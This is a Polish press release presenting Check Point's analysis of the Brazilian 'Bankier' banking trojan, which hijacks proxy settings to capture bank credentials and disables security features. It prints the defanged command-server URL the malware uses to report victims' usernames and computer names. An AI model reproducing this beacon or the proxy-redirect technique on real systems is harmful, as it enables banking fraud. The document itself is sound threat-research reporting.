Brazylijski trojan powraca
Brazylia. Kraj słynący z karnawału, plaż, orzechów kokosowych... i potężnych kampanii wyłudzania informacji. Od dłuższego czasu takie kampanie uważane są za zagrożenie na skalę całego kraju. Brazylijskie organizacje narażone są przeciętnie na ponad 1000 ataków phishingowych miesięcznie.
2016-03-17, 16:44

Zespół badawczy Check Point często wykorzystuje w swoim programie szkoleń badawczych złośliwe oprogramowanie do phishingu pochodzące z Brazylii. Kiedyś daliśmy uczestnikom szkolenia dość stare złośliwe oprogramowanie, trojana zwanego popularnie „Bankierem”, wykrytego po raz pierwszy w 2009 roku.. Bankier nie jest skomplikowany pod względem technicznym, ale stanowi dobry przykład do badań opierających się na wywiadzie jawnoźródłowym (OSINT). Wyniki były całkiem zaskakujące.

Nasze badania wykazały, że chociaż z biegiem lat złośliwe oprogramowanie zmieniało się, to technika zastosowana w oryginalnej próbce jest wciąż jak najbardziej aktualna i prawdopodobnie można ją powiązać z tą samą kampanią lub tym samym sprawcą. Najnowsze próbki pochodzą ze stycznia 2016 roku, a nasilenie ataków wykrywanych przez ThreatCloud firmy Checkpoint sięga ostatnio ponad 100 ataków dziennie tylko w samej Brazylii.

Charakterystyka – jak działa złośliwe oprogramowanie?

„Bankier” próbuje wykraść dane uwierzytelniające użytkownika, by móc dokonywać nieuprawnionych transakcji finansowych. Metoda dokonywania infekcji jest prosta i skuteczna – złośliwe oprogramowanie zmienia konfigurację proxy w systemie operacyjnym atakowanego urządzenia. Za każdym razem, gdy użytkownik próbuje wejść na stronę jednego z banków stanowiących cel ataku, zostaje przekierowany na fałszywą stronę logowania. Myśląc, że loguje się na własny rachunek bankowy, podaje swoje dane uwierzytelniające – które w ten sposób trafiają w ręce autora ataku.

Pliki konfiguracyjne proxy podstawiane przez złośliwe oprogramowanie zawierają ustawienia odwołujące się do konkretnych brazylijskich banków i instytucji finansowych. Ta rodzina programów działa wyłącznie w Brazylii, a zainfekowane urządzenia znajdowane poza tym krajem prawdopodobnie świadczą jedynie o braku planowania i niedokładnej dystrybucji.

Zaczyna się dochodzenie – analizujemy wczesne wersje złośliwego oprogramowania

Wcześniejsze wersje oprogramowania były prostymi plikami wsadowymi skompresowanymi programem UPX. Złośliwe oprogramowanie próbuje zmienić kilka podstawowych ustawień zabezpieczeń, aby uniknąć wykrycia. Wyłącza na przykład powiadomienia z programu antywirusowego i zapory ogniowej, a także weryfikację certyfikatów zabezpieczeń w przeglądarce, kontrolę kont użytkowników i przywracanie systemu.

Ponadto program informuje swoich operatorów o zainfekowaniu danego urządzenia. Uruchamia zminimalizowane okno przeglądarki Internet Explorer i wysyła nazwę użytkownika oraz nazwę komputera ofiary do zdalnego serwera sterującego w postaci adresu URL o następującej budowie:

112[.]72.128.242/famas.php?a=%username%-%computername%

Złośliwe oprogramowanie kopiuje następnie konfigurację proxy do pliku zapisanego w folderze TEMP pod nazwą identyczną z nazwą komputera. Plik konfiguracyjny zawiera zestaw określonych funkcji. Funkcje te polegają zasadniczo na przekierowywaniu ofiary na złośliwe serwery, kiedy odwiedzi ona jedną z domen banków i instytucji finansowych będących celem ataku. Prosty, lecz zaciemniony plik konfiguracyjny zawierał nazwy 23 instytucji finansowych (zobacz załącznik 1).

KONTAKT / AUTOR
Robert Modliński
POBIERZ JAKO WORD
Pobierz .docx
Business News
Biuro prasowe dostarcza WhitePress
Copyright © 2015-2024.  Dla dziennikarzy
Strona, którą przeglądasz jest dedykowaną podstroną serwisu biuroprasowe.pl, administrowaną w zakresie umieszczanych na niej treści przez danego użytkownika usługi Wirtualnego biura prasowego, oferowanej przez WhitePress sp. z o.o. z siedzibą w Bielsku–Białej.

WhitePress sp. z o.o. nie ponosi odpowiedzialności za treści oraz odesłania do innych stron internetowych zamieszczone na podstronach serwisu przez użytkowników Wirtualnego biura prasowego lub zaciągane bezpośrednio z innych serwisów, zgodnie z wybranymi przez tych użytkowników ustawieniami.

W przypadku naruszenia przez takie treści przepisów prawa, dóbr osobistych osób trzecich lub innych powszechnie uznanych norm, podmiotem wyłącznie odpowiedzialnym za naruszenie jest dany użytkownik usługi, który zamieścił przedmiotową treść na dedykowanej podstronie serwisu.